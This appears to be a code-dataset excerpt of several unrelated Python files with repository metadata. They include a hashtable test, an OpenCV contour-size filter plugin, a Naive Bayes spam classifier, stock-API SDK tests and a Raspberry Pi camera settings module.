actual = hash.hashmap_repeated_word(str)
assert excepted == actual
def test_hashmap_repeated_word_2():
hash = HashTable()
str="It was the best of times, it was the worst of times, it was the age of wisdom, it was the age of foolishness, it was the epoch of belief, it was the epoch of incredulity, it was the season of Light, it was the season of Darkness, it was the spring of hope, it was the winter of despair, we had everything before us, we had nothing before us, we were all going direct to Heaven, we were all going direct the other way – in short, the period was so far like the present period, that some of its noisiest authorities insisted on its being received, for good or for evil, in the superlative degree of comparison only..."
excepted = 'it'
actual = hash.hashmap_repeated_word(str)
assert excepted == actual
def test_hashmap_repeated_word_3():
hash = HashTable()
str="It was a queer, sultry summer, the summer they electrocuted the Rosenbergs, and I didn’t know what I was doing in New York..."
excepted = 'summer'
actual = hash.hashmap_repeated_word(str)
assert excepted == actual
| true
| true
|
1c4921cfeca9e8e27f2d0b623dc27dabba9abc92
| 10,495
|
py
|
Python
|
ipt/ipt_filter_contour_by_size.py
|
tpmp-inra/ipapi
|
b0f6be8960a20dbf95ef9df96efdd22bd6e031c5
|
[
"MIT"
] | 1
|
2020-06-30T06:53:36.000Z
|
2020-06-30T06:53:36.000Z
|
ipt/ipt_filter_contour_by_size.py
|
tpmp-inra/ipapi
|
b0f6be8960a20dbf95ef9df96efdd22bd6e031c5
|
[
"MIT"
] | null | null | null |
ipt/ipt_filter_contour_by_size.py
|
tpmp-inra/ipapi
|
b0f6be8960a20dbf95ef9df96efdd22bd6e031c5
|
[
"MIT"
] | null | null | null |
from ipso_phen.ipapi.base.ipt_abstract import IptBase
from ipso_phen.ipapi.tools import regions
import numpy as np
import cv2
import logging
logger = logging.getLogger(__name__)
from ipso_phen.ipapi.base import ip_common as ipc
class IptFilterContourBySize(IptBase):
def build_params(self):
self.add_enabled_checkbox()
self.add_spin_box(
name="min_threshold",
desc="Lower bound limit",
default_value=0,
minimum=0,
maximum=100000000,
hint="Only contours bigger than lower limit bound will be kept",
)
self.add_spin_box(
name="max_threshold",
desc="Upper bound limit",
default_value=100000000,
minimum=0,
maximum=100000000,
hint="Only contours smaller than lower limit bound will be kept",
)
self.add_roi_selector()
def process_wrapper(self, **kwargs):
"""
Filter contour by size:
'Keep or descard contours according to their size
Real time: False
Keyword Arguments (in parentheses, argument name):
* Activate tool (enabled): Toggle whether or not tool is active
* Lower bound limit (min_threshold): Only contours bigger than lower limit bound will be kept
* Upper bound limit (max_threshold): Only contours smaller than lower limit bound will be kept
* Name of ROI to be used (roi_names): Operation will only be applied inside of ROI
* ROI selection mode (roi_selection_mode):
"""
wrapper = self.init_wrapper(**kwargs)
if wrapper is None:
return False
res = False
try:
if self.get_value_of("enabled") == 1:
mask = self.get_mask()
if mask is None:
logger.error(f"FAIL {self.name}: mask must be initialized")
return
lt, ut = self.get_value_of("min_threshold"), self.get_value_of(
"max_threshold"
)
# Get source contours
contours = [
c
for c in ipc.get_contours(
mask=mask,
retrieve_mode=cv2.RETR_LIST,
method=cv2.CHAIN_APPROX_SIMPLE,
)
if cv2.contourArea(c, True) < 0
]
contours.sort(key=lambda x: cv2.contourArea(x), reverse=True)
colors = ipc.build_color_steps(step_count=len(contours))
dbg_img = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
for clr, cnt in zip(colors, contours):
cv2.drawContours(dbg_img, [cnt], 0, clr, -1)
dbg_img = np.dstack(
(
cv2.bitwise_and(dbg_img[:, :, 0], mask),
cv2.bitwise_and(dbg_img[:, :, 1], mask),
cv2.bitwise_and(dbg_img[:, :, 2], mask),
)
)
wrapper.store_image(
image=dbg_img,
text="all_contours",
)
fnt = (cv2.FONT_HERSHEY_SIMPLEX, 0.6)
for cnt in contours:
area_ = cv2.contourArea(cnt)
x, y, w, h = cv2.boundingRect(cnt)
x += w // 2 - 10
y += h // 2
if area_ > 0:
cv2.putText(
dbg_img,
f"{area_}",
(x, y),
fnt[0],
fnt[1],
(255, 255, 255),
2,
)
wrapper.store_image(
image=dbg_img,
text="all_contours_with_sizes",
)
dbg_img = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
out_mask = np.zeros_like(mask)
# Discarded contours
size_cnts = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
for cnt in contours:
area_ = cv2.contourArea(cnt)
if area_ < lt:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_RED, -1)
elif area_ > ut:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_BLUE, -1)
else:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_WHITE, -1)
wrapper.store_image(image=size_cnts, text="cnts_by_size")
# Discarded contours
size_cnts = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
for cnt in sorted(
contours, key=lambda x: cv2.contourArea(x), reverse=True
):
area_ = cv2.contourArea(cnt)
if area_ < lt:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_RED, -1)
elif area_ > ut:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_BLUE, -1)
else:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_WHITE, -1)
wrapper.store_image(image=size_cnts, text="cnts_by_size_reversed")
for cnt in contours:
area_ = cv2.contourArea(cnt)
if not (lt < area_ < ut):
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_RED, -1)
# Discarded contours borders
for cnt in contours:
area_ = cv2.contourArea(cnt)
if not (lt < area_ < ut):
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_MAROON, 4)
# Kept contours
for cnt in contours:
area_ = cv2.contourArea(cnt)
if lt < area_ < ut:
cv2.drawContours(out_mask, [cnt], 0, 255, -1)
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_GREEN, -1)
else:
cv2.drawContours(out_mask, [cnt], 0, 0, -1)
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_RED, -1)
dbg_img = np.dstack(
(
cv2.bitwise_and(dbg_img[:, :, 0], mask),
cv2.bitwise_and(dbg_img[:, :, 1], mask),
cv2.bitwise_and(dbg_img[:, :, 2], mask),
)
)
# Discarded sizes
for cnt in contours:
area_ = cv2.contourArea(cnt)
if not (lt < area_ < ut):
x, y, w, h = cv2.boundingRect(cnt)
x += w // 2 - 10
y += h // 2
cv2.putText(
dbg_img,
f"{area_}",
(x, y),
fnt[0],
fnt[1],
ipc.C_RED,
thickness=2,
)
# Kept sizes
for cnt in contours:
area_ = cv2.contourArea(cnt)
if lt < area_ < ut:
x, y, w, h = cv2.boundingRect(cnt)
x += w // 2 - 10
y += h // 2
cv2.putText(
dbg_img,
f"{area_}",
(x, y),
fnt[0],
fnt[1],
ipc.C_LIME,
thickness=2,
)
out_mask = cv2.bitwise_and(
out_mask,
mask,
)
# Apply ROIs if needed
rois = self.get_ipt_roi(
wrapper=wrapper,
roi_names=self.get_value_of("roi_names").replace(" ", "").split(","),
selection_mode=self.get_value_of("roi_selection_mode"),
)
if rois:
untouched_mask = regions.delete_rois(rois=rois, image=self.get_mask())
self.result = cv2.bitwise_or(
untouched_mask, regions.keep_rois(rois=rois, image=out_mask)
)
self.demo_image = cv2.bitwise_or(
dbg_img,
np.dstack((untouched_mask, untouched_mask, untouched_mask)),
)
else:
self.result = out_mask
self.demo_image = dbg_img
wrapper.store_image(image=self.result, text="filtered_contours")
wrapper.store_image(image=self.demo_image, text="tagged_contours")
res = True
else:
wrapper.store_image(wrapper.current_image, "current_image")
res = True
except Exception as e:
res = False
logger.exception(f"Filter contour by size FAILED, exception: {repr(e)}")
else:
pass
finally:
return res
@property
def name(self):
return "Filter contour by size"
@property
def package(self):
return "TPMP"
@property
def real_time(self):
return False
@property
def result_name(self):
return "mask"
@property
def output_kind(self):
return "mask"
@property
def use_case(self):
return [ipc.ToolFamily.MASK_CLEANUP]
@property
def description(self):
return """'Keep or descard contours according to their size"""
| 38.443223
| 107
| 0.429252
|
from ipso_phen.ipapi.base.ipt_abstract import IptBase
from ipso_phen.ipapi.tools import regions
import numpy as np
import cv2
import logging
logger = logging.getLogger(__name__)
from ipso_phen.ipapi.base import ip_common as ipc
class IptFilterContourBySize(IptBase):
def build_params(self):
self.add_enabled_checkbox()
self.add_spin_box(
name="min_threshold",
desc="Lower bound limit",
default_value=0,
minimum=0,
maximum=100000000,
hint="Only contours bigger than lower limit bound will be kept",
)
self.add_spin_box(
name="max_threshold",
desc="Upper bound limit",
default_value=100000000,
minimum=0,
maximum=100000000,
hint="Only contours smaller than lower limit bound will be kept",
)
self.add_roi_selector()
def process_wrapper(self, **kwargs):
wrapper = self.init_wrapper(**kwargs)
if wrapper is None:
return False
res = False
try:
if self.get_value_of("enabled") == 1:
mask = self.get_mask()
if mask is None:
logger.error(f"FAIL {self.name}: mask must be initialized")
return
lt, ut = self.get_value_of("min_threshold"), self.get_value_of(
"max_threshold"
)
contours = [
c
for c in ipc.get_contours(
mask=mask,
retrieve_mode=cv2.RETR_LIST,
method=cv2.CHAIN_APPROX_SIMPLE,
)
if cv2.contourArea(c, True) < 0
]
contours.sort(key=lambda x: cv2.contourArea(x), reverse=True)
colors = ipc.build_color_steps(step_count=len(contours))
dbg_img = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
for clr, cnt in zip(colors, contours):
cv2.drawContours(dbg_img, [cnt], 0, clr, -1)
dbg_img = np.dstack(
(
cv2.bitwise_and(dbg_img[:, :, 0], mask),
cv2.bitwise_and(dbg_img[:, :, 1], mask),
cv2.bitwise_and(dbg_img[:, :, 2], mask),
)
)
wrapper.store_image(
image=dbg_img,
text="all_contours",
)
fnt = (cv2.FONT_HERSHEY_SIMPLEX, 0.6)
for cnt in contours:
area_ = cv2.contourArea(cnt)
x, y, w, h = cv2.boundingRect(cnt)
x += w // 2 - 10
y += h // 2
if area_ > 0:
cv2.putText(
dbg_img,
f"{area_}",
(x, y),
fnt[0],
fnt[1],
(255, 255, 255),
2,
)
wrapper.store_image(
image=dbg_img,
text="all_contours_with_sizes",
)
dbg_img = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
out_mask = np.zeros_like(mask)
size_cnts = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
for cnt in contours:
area_ = cv2.contourArea(cnt)
if area_ < lt:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_RED, -1)
elif area_ > ut:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_BLUE, -1)
else:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_WHITE, -1)
wrapper.store_image(image=size_cnts, text="cnts_by_size")
size_cnts = np.dstack(
(np.zeros_like(mask), np.zeros_like(mask), np.zeros_like(mask))
)
for cnt in sorted(
contours, key=lambda x: cv2.contourArea(x), reverse=True
):
area_ = cv2.contourArea(cnt)
if area_ < lt:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_RED, -1)
elif area_ > ut:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_BLUE, -1)
else:
cv2.drawContours(size_cnts, [cnt], 0, ipc.C_WHITE, -1)
wrapper.store_image(image=size_cnts, text="cnts_by_size_reversed")
for cnt in contours:
area_ = cv2.contourArea(cnt)
if not (lt < area_ < ut):
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_RED, -1)
for cnt in contours:
area_ = cv2.contourArea(cnt)
if not (lt < area_ < ut):
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_MAROON, 4)
for cnt in contours:
area_ = cv2.contourArea(cnt)
if lt < area_ < ut:
cv2.drawContours(out_mask, [cnt], 0, 255, -1)
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_GREEN, -1)
else:
cv2.drawContours(out_mask, [cnt], 0, 0, -1)
cv2.drawContours(dbg_img, [cnt], 0, ipc.C_RED, -1)
dbg_img = np.dstack(
(
cv2.bitwise_and(dbg_img[:, :, 0], mask),
cv2.bitwise_and(dbg_img[:, :, 1], mask),
cv2.bitwise_and(dbg_img[:, :, 2], mask),
)
)
for cnt in contours:
area_ = cv2.contourArea(cnt)
if not (lt < area_ < ut):
x, y, w, h = cv2.boundingRect(cnt)
x += w // 2 - 10
y += h // 2
cv2.putText(
dbg_img,
f"{area_}",
(x, y),
fnt[0],
fnt[1],
ipc.C_RED,
thickness=2,
)
for cnt in contours:
area_ = cv2.contourArea(cnt)
if lt < area_ < ut:
x, y, w, h = cv2.boundingRect(cnt)
x += w // 2 - 10
y += h // 2
cv2.putText(
dbg_img,
f"{area_}",
(x, y),
fnt[0],
fnt[1],
ipc.C_LIME,
thickness=2,
)
out_mask = cv2.bitwise_and(
out_mask,
mask,
)
rois = self.get_ipt_roi(
wrapper=wrapper,
roi_names=self.get_value_of("roi_names").replace(" ", "").split(","),
selection_mode=self.get_value_of("roi_selection_mode"),
)
if rois:
untouched_mask = regions.delete_rois(rois=rois, image=self.get_mask())
self.result = cv2.bitwise_or(
untouched_mask, regions.keep_rois(rois=rois, image=out_mask)
)
self.demo_image = cv2.bitwise_or(
dbg_img,
np.dstack((untouched_mask, untouched_mask, untouched_mask)),
)
else:
self.result = out_mask
self.demo_image = dbg_img
wrapper.store_image(image=self.result, text="filtered_contours")
wrapper.store_image(image=self.demo_image, text="tagged_contours")
res = True
else:
wrapper.store_image(wrapper.current_image, "current_image")
res = True
except Exception as e:
res = False
logger.exception(f"Filter contour by size FAILED, exception: {repr(e)}")
else:
pass
finally:
return res
@property
def name(self):
return "Filter contour by size"
@property
def package(self):
return "TPMP"
@property
def real_time(self):
return False
@property
def result_name(self):
return "mask"
@property
def output_kind(self):
return "mask"
@property
def use_case(self):
return [ipc.ToolFamily.MASK_CLEANUP]
@property
def description(self):
return """'Keep or descard contours according to their size"""
| true
| true
|
1c4921e62a6001ff0f0f76cfce152834392f6e19
| 580
|
py
|
Python
|
run_gpulearn_yz_x.py
|
noskill/nips14-ssl
|
4c4aa624d6f666814f3c058141dd52cf7aabdee6
|
[
"MIT"
] | 496
|
2015-01-02T06:44:17.000Z
|
2022-03-17T22:02:34.000Z
|
run_gpulearn_yz_x.py
|
noskill/nips14-ssl
|
4c4aa624d6f666814f3c058141dd52cf7aabdee6
|
[
"MIT"
] | 6
|
2015-01-16T00:04:31.000Z
|
2018-06-25T07:02:26.000Z
|
run_gpulearn_yz_x.py
|
noskill/nips14-ssl
|
4c4aa624d6f666814f3c058141dd52cf7aabdee6
|
[
"MIT"
] | 184
|
2015-01-02T05:16:08.000Z
|
2021-04-08T10:31:42.000Z
|
import gpulearn_yz_x
import sys
if sys.argv[1] == 'svhn':
n_hidden = [500,500]
if len(sys.argv) == 4:
n_hidden = [int(sys.argv[2])]*int(sys.argv[3])
gpulearn_yz_x.main(dataset='svhn', n_z=300, n_hidden=n_hidden, seed=0, gfx=True)
elif sys.argv[1] == 'mnist':
n_hidden = (500,500)
if len(sys.argv) >= 4:
n_hidden = [int(sys.argv[2])]*int(sys.argv[3])
n_z = 50
if len(sys.argv) >= 5:
n_z = int(sys.argv[4])
gpulearn_yz_x.main(dataset='mnist', n_z=n_z, n_hidden=n_hidden, seed=0, gfx=True)
raise Exception("Unknown dataset")
| 30.526316
| 85
| 0.617241
|
import gpulearn_yz_x
import sys
if sys.argv[1] == 'svhn':
n_hidden = [500,500]
if len(sys.argv) == 4:
n_hidden = [int(sys.argv[2])]*int(sys.argv[3])
gpulearn_yz_x.main(dataset='svhn', n_z=300, n_hidden=n_hidden, seed=0, gfx=True)
elif sys.argv[1] == 'mnist':
n_hidden = (500,500)
if len(sys.argv) >= 4:
n_hidden = [int(sys.argv[2])]*int(sys.argv[3])
n_z = 50
if len(sys.argv) >= 5:
n_z = int(sys.argv[4])
gpulearn_yz_x.main(dataset='mnist', n_z=n_z, n_hidden=n_hidden, seed=0, gfx=True)
raise Exception("Unknown dataset")
| true
| true
|
1c4922310667808dfb15380c7f3590c83f9563ff
| 1,985
|
py
|
Python
|
process_data.py
|
ekhoda/optimization-tutorial
|
8847625aa49813823b47165c5f457294729459b6
|
[
"MIT"
] | 41
|
2019-03-07T17:03:51.000Z
|
2021-11-08T12:19:54.000Z
|
process_data.py
|
ekhoda/optimization-tutorial
|
8847625aa49813823b47165c5f457294729459b6
|
[
"MIT"
] | null | null | null |
process_data.py
|
ekhoda/optimization-tutorial
|
8847625aa49813823b47165c5f457294729459b6
|
[
"MIT"
] | 15
|
2018-11-15T11:30:51.000Z
|
2022-01-08T08:58:33.000Z
|
import pandas as pd
from helper import load_raw_data
def load_data():
return get_modified_data(load_raw_data())
def get_modified_data(input_df_dict):
# Our "parameters" table is very simple here. So, we can create a new dictionary
# for our parameters as follows or just modify our df a little in place.
# There shouldn't be any performance gain here to concern us, so I went with
# the dictionary. In the comment below, I also show the latter for illustration
# input_df_dict['parameters'].set_index('attribute', inplace=True)
input_param_dict = input_df_dict['parameters'].set_index('attribute')['value'].to_dict()
return input_df_dict, input_param_dict
# To not overkill, I only created one module here for processing the data, either input or output
def _create_outputs_df(opt_series, cols, name, output_df_dict):
df = pd.DataFrame(data=opt_series, index=opt_series.index.values).reset_index()
df.columns = cols
output_df_dict[name] = df
def write_outputs(dict_of_variables, attr='varValue'):
"""
The outputs we want are very simple and can be achieved almost identically
in either modules. The only difference is in the attribute name of their
decision variable value.
In gurobi you get it by 'your_dv.x',
in pulp by 'your_dv.varValue',
in cplex by 'your_dv.solution_value'.
"""
output_df_dict = {}
cols = ['period', 'value']
for name, var in dict_of_variables.items():
opt_series = pd.Series({k + 1: getattr(v, attr) for k, v in var.items()})
_create_outputs_df(opt_series, cols, name, output_df_dict)
return output_df_dict
def write_outputs_xpress(dict_of_variables, model):
output_df_dict = {}
cols = ['period', 'value']
for name, var in dict_of_variables.items():
opt_series = pd.Series({k + 1: model.getSolution(v) for k, v in var.items()})
_create_outputs_df(opt_series, cols, name, output_df_dict)
return output_df_dict
| 37.45283
| 97
| 0.71738
|
import pandas as pd
from helper import load_raw_data
def load_data():
return get_modified_data(load_raw_data())
def get_modified_data(input_df_dict):
# the dictionary. In the comment below, I also show the latter for illustration
# input_df_dict['parameters'].set_index('attribute', inplace=True)
input_param_dict = input_df_dict['parameters'].set_index('attribute')['value'].to_dict()
return input_df_dict, input_param_dict
# To not overkill, I only created one module here for processing the data, either input or output
def _create_outputs_df(opt_series, cols, name, output_df_dict):
df = pd.DataFrame(data=opt_series, index=opt_series.index.values).reset_index()
df.columns = cols
output_df_dict[name] = df
def write_outputs(dict_of_variables, attr='varValue'):
output_df_dict = {}
cols = ['period', 'value']
for name, var in dict_of_variables.items():
opt_series = pd.Series({k + 1: getattr(v, attr) for k, v in var.items()})
_create_outputs_df(opt_series, cols, name, output_df_dict)
return output_df_dict
def write_outputs_xpress(dict_of_variables, model):
output_df_dict = {}
cols = ['period', 'value']
for name, var in dict_of_variables.items():
opt_series = pd.Series({k + 1: model.getSolution(v) for k, v in var.items()})
_create_outputs_df(opt_series, cols, name, output_df_dict)
return output_df_dict
| true
| true
|
1c4922af46079adc1099dbedfdb026e3a72fa3a1
| 2,275
|
py
|
Python
|
tests/test_public_functions.py
|
staneslevski/WorldTradingDataPythonSDK
|
3460160acb8194bbc9bb1373e48b95e9d520c402
|
[
"MIT"
] | 12
|
2019-07-30T12:38:12.000Z
|
2022-01-15T10:05:47.000Z
|
tests/test_public_functions.py
|
staneslevski/WorldTradingDataPythonSDK
|
3460160acb8194bbc9bb1373e48b95e9d520c402
|
[
"MIT"
] | 2
|
2020-06-09T18:03:11.000Z
|
2021-06-01T23:57:47.000Z
|
tests/test_public_functions.py
|
staneslevski/WorldTradingDataPythonSDK
|
3460160acb8194bbc9bb1373e48b95e9d520c402
|
[
"MIT"
] | null | null | null |
from worldtradingdata.public.base import WorldTradingData
import worldtradingdata.public.base as wtd_lib
from .secure import api_token
# def test_world_trading_data_class():
# wtd = worldtradingdata(api_token)
# result = wtd.stock_search('AAPL')
# # print(result)
# assert type(result) == dict
# new_result = wtd.stock_search('AAPL', {'output': 'csv'})
# assert type(new_result) == str
# new_result = wtd.stock_search('AAPL', {'api_token': 'not_my_token'})
# assert type(result) == dict
def test_filter_unwanted_params():
params = {
'foo': 'bar',
'horrible': 'do no keep me'
}
unwanted_keys = ['horrible']
filtered = wtd_lib.filter_unwanted_params(params, unwanted_keys)
assert len(filtered) == 1
assert filtered == {'foo': 'bar'}
def filter_search_params():
params = {
'api_token': 'this is not my token',
'search_by': 'symbol'
}
filtered = wtd_lib.filter_search_params(params)
assert filtered == {'search_by': 'symbol'}
def test_reduce_list_to_string():
symbols_list = ['AAPL', 'GOOG']
symbols_string = 'GOOG,AAPL'
result = wtd_lib.reduce_list_to_string(symbols_list)
assert result == symbols_string
# def test_wtd_stock():
# wtd = worldtradingdata(api_token)
# result = wtd.stock(['AAPL'])
# assert type(result) == dict
# result = wtd.stock(['AAPL', 'GOOG'])
# assert type(result) == dict
# result = wtd.stock(['AAPL', 'GOOG'], {'output': 'csv'})
# assert type(result) == str
#
#
# def test_mutual_fund():
# wtd = worldtradingdata(api_token)
# res = wtd.mutual_fund(['AAAAX', 'AAADX', 'AAAGX'])
# assert type(res) == dict
# res = wtd.mutual_fund(['AAAAX', 'AAADX', 'AAAGX'], {'output': 'csv'})
# assert type(res) == str
# res = wtd.mutual_fund(['AAAAX', 'AAADX', 'AAAGX'], {'sort_by': 'name'})
# assert type(res) == dict
def test_intraday():
wtd = WorldTradingData(api_token)
symbol = 'aapl'
time_interval = 5
day_range = 2
res = wtd.intraday(symbol, time_interval, day_range)
assert type(res) == dict
assert 'symbol' in res.keys()
assert 'stock_exchange_short' in res.keys()
assert 'timezone_name' in res.keys()
assert 'intraday' in res.keys()
| 30.743243
| 77
| 0.639121
|
from worldtradingdata.public.base import WorldTradingData
import worldtradingdata.public.base as wtd_lib
from .secure import api_token
def test_filter_unwanted_params():
params = {
'foo': 'bar',
'horrible': 'do no keep me'
}
unwanted_keys = ['horrible']
filtered = wtd_lib.filter_unwanted_params(params, unwanted_keys)
assert len(filtered) == 1
assert filtered == {'foo': 'bar'}
def filter_search_params():
params = {
'api_token': 'this is not my token',
'search_by': 'symbol'
}
filtered = wtd_lib.filter_search_params(params)
assert filtered == {'search_by': 'symbol'}
def test_reduce_list_to_string():
symbols_list = ['AAPL', 'GOOG']
symbols_string = 'GOOG,AAPL'
result = wtd_lib.reduce_list_to_string(symbols_list)
assert result == symbols_string
def test_intraday():
wtd = WorldTradingData(api_token)
symbol = 'aapl'
time_interval = 5
day_range = 2
res = wtd.intraday(symbol, time_interval, day_range)
assert type(res) == dict
assert 'symbol' in res.keys()
assert 'stock_exchange_short' in res.keys()
assert 'timezone_name' in res.keys()
assert 'intraday' in res.keys()
| true
| true
|
1c4922b8a88085015e55a3d6c6e0df39358c9b9b
| 3,577
|
py
|
Python
|
DataAnalysis/day1_9/bayes.py
|
yunjung-lee/class_python_numpy
|
589817c8bbca85d70596e4097c0ece093b5353c3
|
[
"MIT"
] | null | null | null |
DataAnalysis/day1_9/bayes.py
|
yunjung-lee/class_python_numpy
|
589817c8bbca85d70596e4097c0ece093b5353c3
|
[
"MIT"
] | null | null | null |
DataAnalysis/day1_9/bayes.py
|
yunjung-lee/class_python_numpy
|
589817c8bbca85d70596e4097c0ece093b5353c3
|
[
"MIT"
] | null | null | null |
"""
1) 텍스트 -> 학습 -> 모델
2) 모델 -> 새로운 텍스트 입력 -> 분류 결과
"""
import math, sys
from konlpy.tag import Twitter
class BayesianFilter:
def __init__(self): #:java의 this=python의 self ,__init__:오타 주의
# print("생성자 함수") self. : init에 붙어있는 함수=> 이름을 모두 써줘야한다.(self. 포함)
self.words =set() #중복된 데이터가 있더라도 하나만 있게된다.
self.word_dict={} #단어추가
self.category_dict={}
#전달 받은 text에 대한 형태소 분석
def split(self,text):
twitter = Twitter()
mailList = twitter.pos(text,norm=True, stem=True)
#print(mailList)
results =[]
for word in mailList:
if not word[1] in ['Josa','Eomi','Punctuation']:
results.append(word[0])
#print(results)
return results
#inc_word : 단어를 카테고리에 추가
def inc_word(self,word,category): #카테고리를 만들고 그 카테고리에 단어를 추가하자
# print(word,category) # "파격 세일 - 오늘까지 30% 할인합니다.", "광고"
if not category in self.word_dict:
self.word_dict[category]={} #딕셔너리 안에 딕셔너리가 들어가는 형태
if not word in self.word_dict[category]:
self.word_dict[category][word] = 0 #딕셔너리의 중첩 표현
self.word_dict[category][word] += 1
self.words.add(word)
# # print("="*50)
# print(self.word_dict)
# # print("=" * 50)
# print(self.words)
def category_prob(self,category):
sum_categories = sum(self.category_dict.values())
category_v = self.category_dict[category] #5개 : 광고 카테고리에 속하는 광고
return category_v / sum_categories
#'광고' => 5/10이 리턴, '중요' => 5/10이 리턴.
def score(self,words,category):
#words :['재고', '정리', '할인', '무료', '배송']
#category : '광고'
#print("score function : ", category)
score = math.log(self.category_prob(category))
print("스코어:",score)
for word in words:
score +=math.log(self.word_prob(word,category))
return score
#카테도리 내부의 단어 출현 비율 계산
def word_prob(self,word,category):
n=self.get_word_count(word,category)+1 #카테고리 내부의 출현 빈도수
d=sum(self.word_dict[category].values())+len(self.words) #해당카테고리 단어수+전체 단어수
#print(n/d) #len(dict) : dictionary의 키의 갯수를 출력
return n/d
#d : 광고 카테고리에 속하는 단어들의 등장 횟수의 총합+분류 대상 문장을 구성하는-> 전체 단어의 수
# print(n)
def get_word_count(self,word,category):
if word in self.word_dict[category]:
return self.word_dict[category][word]
else:
return 0
#text='재고 , 정리 할인, 무료 배송'
def predict(self,text):
best_category = None
words =self.split(text)
score_list = []
max_score = -sys.maxsize
#print(words) #['재고', '정리', '할인', '무료', '배송']
for category in self.category_dict.keys():
score = self.score(words,category)
score_list.append((category,score))
if score> max_score:
max_score = score
best_category=category
return best_category,score_list
def fit(self,text,category):
#텍스트를 읽어 학습\
word_list = self.split(text)
for word in word_list :
#print(word)
self.inc_word(word,category)
self.inc_category(category)
#카테고리 계산 부분
def inc_category(self,category):
# print(category)
if not category in self.category_dict: #category_dict에 category (광고,중요) 가 없다면
self.category_dict[category]=0
self.category_dict[category] +=1
# print(self.category_dict)
| 33.12037
| 90
| 0.567515
|
import math, sys
from konlpy.tag import Twitter
class BayesianFilter:
def __init__(self): self.words =set() self.word_dict={} self.category_dict={}
def split(self,text):
twitter = Twitter()
mailList = twitter.pos(text,norm=True, stem=True)
results =[]
for word in mailList:
if not word[1] in ['Josa','Eomi','Punctuation']:
results.append(word[0])
return results
def inc_word(self,word,category): if not category in self.word_dict:
self.word_dict[category]={} if not word in self.word_dict[category]:
self.word_dict[category][word] = 0 self.word_dict[category][word] += 1
self.words.add(word)
def category_prob(self,category):
sum_categories = sum(self.category_dict.values())
category_v = self.category_dict[category] return category_v / sum_categories
def score(self,words,category):
score = math.log(self.category_prob(category))
print("스코어:",score)
for word in words:
score +=math.log(self.word_prob(word,category))
return score
def word_prob(self,word,category):
n=self.get_word_count(word,category)+1 d=sum(self.word_dict[category].values())+len(self.words) return n/d
def get_word_count(self,word,category):
if word in self.word_dict[category]:
return self.word_dict[category][word]
else:
return 0
def predict(self,text):
best_category = None
words =self.split(text)
score_list = []
max_score = -sys.maxsize
for category in self.category_dict.keys():
score = self.score(words,category)
score_list.append((category,score))
if score> max_score:
max_score = score
best_category=category
return best_category,score_list
def fit(self,text,category):
word_list = self.split(text)
for word in word_list :
self.inc_word(word,category)
self.inc_category(category)
def inc_category(self,category):
if not category in self.category_dict: self.category_dict[category]=0
self.category_dict[category] +=1
| true
| true
|
1c4923a68f5b3aa7d928c0a1116e10e76c6838cc
| 52
|
py
|
Python
|
rl_trader/engine/rl_environment/types/test/env_account_types.test.py
|
AlexandreMahdhaoui/rl_trader
|
5bda02622c7e17c4e6f28a90c510cfe8f914f7a8
|
[
"Apache-2.0"
] | null | null | null |
rl_trader/engine/rl_environment/types/test/env_account_types.test.py
|
AlexandreMahdhaoui/rl_trader
|
5bda02622c7e17c4e6f28a90c510cfe8f914f7a8
|
[
"Apache-2.0"
] | null | null | null |
rl_trader/engine/rl_environment/types/test/env_account_types.test.py
|
AlexandreMahdhaoui/rl_trader
|
5bda02622c7e17c4e6f28a90c510cfe8f914f7a8
|
[
"Apache-2.0"
] | null | null | null |
# TODO: TokenWallet
# TODO: Wallets
# TODO: Order
| 8.666667
| 19
| 0.673077
| true
| true
|
|
1c4924a89870fba8aeb1a80cb094666a4e54672e
| 1,810
|
py
|
Python
|
PiCode/src/maskcam/settings.py
|
SilentByte/healthcam
|
70401073d6695196e2d3bc6c86e96e822f5d3f7f
|
[
"MIT"
] | 2
|
2020-07-14T22:36:38.000Z
|
2020-10-04T19:05:58.000Z
|
PiCode/src/maskcam/settings.py
|
SilentByte/healthcam
|
70401073d6695196e2d3bc6c86e96e822f5d3f7f
|
[
"MIT"
] | 1
|
2021-03-10T14:44:52.000Z
|
2021-03-10T14:44:52.000Z
|
PiCode/src/maskcam/settings.py
|
SilentByte/healthcam
|
70401073d6695196e2d3bc6c86e96e822f5d3f7f
|
[
"MIT"
] | 1
|
2020-06-13T20:19:13.000Z
|
2020-06-13T20:19:13.000Z
|
from knobs import Knob
from socket import gethostname
# Knobs are basically wrappers for os.getenvs that have some niceties
CAMERA_NUMBER = Knob(env_name="CAMERA_NUMBER", default=0,
description="Raspberry Pi camera number according to "
"https://picamera.readthedocs.io/en/release-1.13/api_camera.html#picamera")
INVERT_CAMERA = Knob(env_name="CAMERA_INVERT", default=True, description="Vertical invert camera")
DEVICE_NAME = Knob(env_name="DEVICE_NAME", default=gethostname(), description="Device Name")
AWS_REGION = Knob(env_name="AWS_REGION", default='us-east=1', description="AWS region that your resources live in")
MODEL_ENDPOINT_NAME = Knob(env_name="AWS_MODEL_ENDPOINT_NAME", default=False,
description="AWS Model endpoint for CVEDIA Human Detector")
